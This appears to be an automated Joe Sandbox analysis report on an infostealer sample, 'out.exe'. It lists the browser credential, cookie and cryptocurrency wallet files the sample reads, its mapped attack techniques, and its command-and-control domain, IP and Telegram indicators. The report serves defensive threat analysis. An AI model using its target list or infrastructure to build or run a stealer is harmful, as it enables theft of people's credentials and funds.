                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\MultiDoge\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Binance\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                              Source: C:\Users\user\Desktop\out.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                              Source: Yara match; File source: Process Memory Space: out.exe PID: 1396, type: MEMORYSTR

                              Remote Access Functionality

                              Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                              Source: Yara match; File source: out.exe, type: SAMPLE
                              Source: Yara match; File source: 0.2.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 0.0.out.exe.20000.0.unpack, type: UNPACKEDPE
                              Source: Yara match; File source: 00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match; File source: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match; File source: Process Memory Space: out.exe PID: 1396, type: MEMORYSTR
                              Source: C:\Users\user\Desktop\out.exe; Code function: 0_2_6C600C40 sqlite3_bind_zeroblob,0_2_6C600C40
                              Source: C:\Users\user\Desktop\out.exe; Code function: 0_2_6C600D60 sqlite3_bind_parameter_name,0_2_6C600D60
                              Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                              Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 221 Process Injection | 1 Masquerading | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 21 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                              Credentials | Domains | Default Accounts | 1 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Virtualization/Sandbox Evasion | 1 Credentials in Registry | 151 Security Software Discovery | Remote Desktop Protocol | 4 Data from Local System | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                              Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 221 Process Injection | Security Account Manager | 1 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
                              Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 12 Process Discovery | Distributed Component Object Model | Input Capture | 114 Application Layer Protocol | Traffic Duplication | Data Destruction
                              Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
                              Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                              DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                              Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 4 File and Directory Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 55 System Information Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                              Source | Detection | Scanner | Label | Link
                              out.exe | 100% | Joe Sandbox ML | |

                              Source | Detection | Scanner | Label | Link
                              C:\ProgramData\freebl3.dll | 0% | ReversingLabs | |
                              C:\ProgramData\mozglue.dll | 0% | ReversingLabs | |
                              C:\ProgramData\msvcp140.dll | 0% | ReversingLabs | |
                              C:\ProgramData\nss3.dll | 0% | ReversingLabs | |
                              C:\ProgramData\softokn3.dll | 0% | ReversingLabs | |
                              C:\ProgramData\vcruntime140.dll | 0% | ReversingLabs | |

                              No Antivirus matches
                              No Antivirus matches
                              Name | IP | Active | Malicious | Antivirus Detection | Reputation
                              steamcommunity.com | 104.102.49.254 | true | true | | unknown
                              cowod.hopto.org | 45.132.206.251 | true | true | | unknown

                              Name | Malicious | Antivirus Detection | Reputation
                              https://49.12.106.214/mozglue.dll | true | | unknown
                              https://49.12.106.214/ | true | | unknown
                              https://49.12.106.214/nss3.dll | true | | unknown
                              https://49.12.106.214/softokn3.dll | true | | unknown
                              https://49.12.106.214/freebl3.dll | true | | unknown

                              Name | Source | Malicious | Antivirus Detection | Reputation
                                                            unknown
                                                            http://www.valvesoftware.com/legal.htmout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://www.youtube.comout.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngout.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://www.google.comout.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://49.12.106.21476561199780418869[1].htm.0.drfalse
                                                                  unknown
                                                                  https://49.12.106.214/softokn3.dllgout.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://cowod.hopto.org_DEBUG.zip/cout.exefalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://49.12.106.214/softokn3.dllmout.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      http://cowod.hopto.out.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                        unknown
                                                                        https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://cowod.hoptoEBFHJKKout.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                          unknown
                                                                          https://49.12.106.214/msvcp140.dll.4.349.12.106.214DEXout.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0out.exetrue
                                                                              unknown
                                                                              https://49.12.106.214/msvcp140.dll#out.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                http://cowod.hoptoout.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                  unknown
                                                                                  https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                  • URL Reputation: safe
                                                                                  unknown
                                                                                  https://s.ytimg.com;out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://steam.tv/out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://community.akamai.steamsout.exefalse
                                                                                      unknown
                                                                                      https://t.me/ae5edout.exetrue
                                                                                      • URL Reputation: malware
                                                                                      unknown
                                                                                      http://www.mozilla.com/en-US/blocklist/out.exe, out.exe, 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.drfalse
                                                                                        unknown
                                                                                        https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://mozilla.org0/out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://store.steampowered.com/privacy_agreement/out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://store.steampowered.com/points/shop/out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://49.12.106.214GDAKout.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                          unknown
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://49.12.106.214/vcruntime140.dll4/msvcp140.dllGEout.exe, 00000000.00000003.2549799189.0000000003053000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://sketchfab.comout.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://www.ecosia.org/newtab/out.exe, 00000000.00000003.2417618163.0000000003089000.00000004.00000020.00020000.00000000.sdmp, HDAAAA.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://lv.queniujq.cnout.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brAFIDGD.0.drfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://www.youtube.com/out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&aout.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                  unknown
                                                                                                  https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://store.steampowered.com/privacy_agreement/out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2283659720.0000000002FA6000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0out.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  https://steamcommunity.com/profiles/76561199780418869hout.exe, 00000000.00000003.2297618303.0000000002F82000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002F75000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://49.12.106.214/msvcp140.dllGEout.exe, 00000000.00000003.2501366593.000000000305C000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2501204879.000000000305A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amout.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      http://cowod.HJKFIEBFHJKKout.exe, 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpfalse
                                                                                                        unknown
                                                                                                        https://www.google.com/recaptcha/out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://checkout.steampowered.com/out.exe, 00000000.00000003.2283659720.0000000002FB4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLAFIDGD.0.drfalse
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishout.exe, 00000000.00000003.2297569083.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2339882305.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676579434.0000000002FA7000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2353507483.0000000002FB2000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2326780242.0000000002FB3000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2313511682.0000000002FAD000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmp, 76561199780418869[1].htm.0.drfalse
                                                                                                            unknown
IP | Domain | Country | ASN | ASN Name | Malicious
49.12.106.214 | unknown | Germany | 24940 | HETZNER-ASDE | true
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | true
45.132.206.251 | cowod.hopto.org | Russian Federation | 59731 | LIFELINK-ASRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1528360
Start date and time: 2024-10-07 20:34:04 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 48s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: out.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/21@2/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 89
• Number of non-executed functions: 216
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: out.exe
                                                                                                                                            Time | Type | Description
                                                                                                                                            14:35:26 | API Interceptor | 1x Sleep call for process: out.exe modified
                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                            49.12.106.214down.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              zncaKWwEdq.exeGet hashmaliciousVidarBrowse
                                                                                                                                                104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                • www.valvesoftware.com/legal.htm
                                                                                                                                                45.132.206.251f1r6P3j3g7.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                • cowod.hopto.org/
